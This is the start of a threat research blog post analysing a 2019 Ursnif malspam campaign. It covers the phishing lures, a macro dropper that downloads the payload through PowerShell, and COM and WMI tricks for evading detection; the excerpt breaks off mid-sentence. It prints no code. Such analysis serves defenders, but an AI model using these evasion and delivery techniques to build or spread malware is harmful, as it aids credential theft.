HP Threat Research Blog Tricks and COMfoolery: How Ursnif Evades Detection

Bromium Ursnif Evades Detection Blog Image

March 7, 2019 Category: Uncategorized By: Alex Holland Comments: 0

Tricks and COMfoolery: How Ursnif Evades Detection

  • Ursnif is one of the main threats that is effectively evading detection right now (at publication)
  • The dropper uses a COM technique to hide its process parentage
  • WMI is used to bypass a Windows Defender attack surface reduction rule
  • Fast evolution of delivery servers means detection tools are left in the dark

In February we saw a resurgence of Ursnif (also known as Gozi), a credential-stealing Trojan that was first uncovered in 2007 and has been active ever since. Alongside Emotet, this threat is one of the most pervasive and effective malware families currently being delivered through malicious spam campaigns.

The recent campaign we observed used a standard multi-stage malware delivery mechanism, consisting of a phishing email delivering a Microsoft Word dropper containing a VBA AutoOpen macro inside a password-protected zip file. When opened, the document downloads the Ursnif executable from a remote server using PowerShell WebClient.DownloadFile, WebClient.DownloadString or WebClient.DownloadData methods. Unlike many run-of-the-mill malicious spam campaigns, what’s interesting is how Ursnif’s operators link different techniques together to effectively socially engineer targets, evade perimeter detection and bypass one of Windows Defender’s attack surface reduction rules.

Ursnif infection chain Bromium blog

Ursnif infection chain

Effective Social Engineering

Ursnif’s operators commonly tailor the phishing lure used against targets to make the email appear more authentic. In this campaign, this was done by basing attachment names and the message body on businesses in the same or related industries, or those that are geographically close to the target. In one of the samples we analysed, the target was a manufacturer of a niche product. The